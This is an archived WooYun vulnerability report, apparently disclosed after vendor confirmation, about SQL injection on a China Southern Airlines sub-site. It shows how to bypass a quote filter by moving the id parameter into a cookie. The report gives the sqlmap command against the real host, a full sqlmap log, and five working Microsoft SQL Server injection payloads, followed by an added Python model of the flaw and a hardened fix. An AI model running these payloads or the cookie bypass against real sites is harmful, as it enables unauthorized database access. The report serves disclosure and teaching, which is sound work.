WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-12-26: Details sent to the vendor, awaiting the vendor's handling
2015-12-28: Vendor has confirmed; details disclosed to the vendor only
2016-01-07: Details disclosed to core white hats and experts in the relevant field
2016-01-17: Details disclosed to regular white hats
2016-01-27: Details disclosed to intern white hats
2016-02-09: Details disclosed to the public
China Southern Airlines: bypassing the block on a certain site to continue SQL injection
This friend's report, WooYun: 中国南方航空某分站存在SQL注入漏洞 (SQL injection vulnerability on a China Southern Airlines sub-site), shows through his sqlmap screenshot and his manual injection screenshots that at that time the system had no blocking in place at all. I tested this link: http://www.xjair.com/article.aspx?id=201511201801521300 and appended a single quote; the system has since added a block: http://www.xjair.com/article.aspx?id=201511201801521300' now responds with a message that adding illegal characters is forbidden.
[So I changed the ordinary injection into a cookie injection]
python sqlmap.py -u "http://www.xjair.com/article.aspx" --cookie "id=201511201801521300" --level 2 --current-db
This bypassed the system's block and the injection succeeded. [Bypass method]:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (Cookie)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=201511201801521300' AND 5620=5620 AND 'CdDe'='CdDe

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=201511201801521300' AND 5657=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (5657=5657) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(113))) AND 'aOBp'='aOBp

    Type: UNION query
    Title: Generic UNION query (NULL) - 14 columns
    Payload: id=201511201801521300' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(112)+CHAR(107)+CHAR(113)+CHAR(107)+CHAR(75)+CHAR(98)+CHAR(112)+CHAR(120)+CHAR(79)+CHAR(87)+CHAR(115)+CHAR(106)+CHAR(86)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=201511201801521300'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=201511201801521300' WAITFOR DELAY '0:0:5'--
---
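Why the cookie worked: the block inspected the query-string value, while the page apparently read `id` from whichever request source supplied it (the classic ASP / ASP.NET Request("id") lookup order, which falls back to cookies). The following is an added illustration, not the site's code, modelling that handler in Python with an in-memory SQLite table, using the boolean payloads from the sqlmap output above, beside a hardened version that reads `id` only from the intended source, validates its shape and binds it as a parameter. The table contents and the 18-digit id format are constructed assumptions.

```python
import re
import sqlite3

# Constructed model of the article.aspx handler (not the site's real code).
ILLEGAL = re.compile(r"['\";]|--")        # the "illegal characters" the block rejects
ID_FORMAT = re.compile(r"[0-9]{18}")      # assumed shape of ids such as 201511201801521300


def make_db():
    """Constructed sample table standing in for the real article table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id TEXT, title TEXT)")
    conn.executemany("INSERT INTO article VALUES (?, ?)",
                     [("201511201801521300", "Flight notice"),
                      ("201511201801521301", "Other notice")])
    return conn


def request_param(query, cookies, name):
    """Mimic Request("id"): query string first, then fall back to cookies."""
    return query.get(name, cookies.get(name))


def lookup_vulnerable(conn, query, cookies):
    """The pattern the report describes: reject quotes in the query string
    only, then build SQL from whichever source actually supplied 'id'."""
    if query.get("id") is not None and ILLEGAL.search(query["id"]):
        return "blocked"                  # what the author saw on the GET parameter
    id_val = request_param(query, cookies, "id")
    sql = f"SELECT title FROM article WHERE id='{id_val}'"   # string concatenation
    return [row[0] for row in conn.execute(sql)]


def lookup_hardened(conn, query, cookies):
    """Read 'id' from the intended source only, validate its shape, bind it."""
    id_val = query.get("id")              # cookies are never consulted for this value
    if id_val is None or not ID_FORMAT.fullmatch(id_val):
        return "rejected"
    rows = conn.execute("SELECT title FROM article WHERE id=?", (id_val,))
    return [row[0] for row in rows]
```

With a true boolean payload in the cookie, the vulnerable lookup returns the same row as the legitimate id; with the comparison changed to a false one it returns nothing, which is exactly the differential sqlmap's boolean-based blind technique relies on.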
[sqlmap screenshot]:
Current database:
[Full sqlmap run]:
[19:38:03] [INFO] testing connection to the target URL
[19:38:04] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N] y
[19:38:06] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[19:38:06] [WARNING] no WAF/IDS/IPS product has been identified
[19:38:06] [INFO] testing if the target URL is stable. This can take a couple of seconds
[19:38:07] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[19:38:43] [INFO] testing if Cookie parameter 'id' is dynamic
[19:38:43] [INFO] confirming that Cookie parameter 'id' is dynamic
[19:38:44] [INFO] Cookie parameter 'id' is dynamic
[19:38:45] [WARNING] heuristic (basic) test shows that Cookie parameter 'id' might not be injectable
[19:38:45] [INFO] testing for SQL injection on Cookie parameter 'id'
[19:38:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:38:51] [INFO] Cookie parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[19:38:54] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'Microsoft SQL Server'
do you want to include all tests for 'Microsoft SQL Server' extending provided level (2) and risk (1) values? [Y/n]
[19:38:55] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[19:38:56] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[19:38:56] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[19:38:56] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:38:57] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:38:57] [INFO] Cookie parameter 'id' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable
[19:38:57] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:38:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[19:39:48] [INFO] Cookie parameter 'id' seems to be 'Microsoft SQL Server/Sybase stacked queries' injectable
[19:39:48] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:40:39] [INFO] Cookie parameter 'id' seems to be 'Microsoft SQL Server/Sybase time-based blind' injectable
[19:40:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:40:39] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:40:47] [INFO] target URL appears to be UNION injectable with 14 columns
[19:40:48] [INFO] Cookie parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
Cookie parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 55 HTTP(s) requests:
---
Parameter: id (Cookie)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=201511201801521300' AND 5620=5620 AND 'CdDe'='CdDe

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=201511201801521300' AND 5657=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (5657=5657) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(113))) AND 'aOBp'='aOBp

    Type: UNION query
    Title: Generic UNION query (NULL) - 14 columns
    Payload: id=201511201801521300' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(112)+CHAR(107)+CHAR(113)+CHAR(107)+CHAR(75)+CHAR(98)+CHAR(112)+CHAR(120)+CHAR(79)+CHAR(87)+CHAR(115)+CHAR(106)+CHAR(86)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=201511201801521300'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=201511201801521300' WAITFOR DELAY '0:0:5'--
---
[19:41:05] [INFO] testing Microsoft SQL Server
[19:41:05] [INFO] confirming Microsoft SQL Server
[19:41:07] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2015-12-28 09:30
Thanks for the reminder.
None yet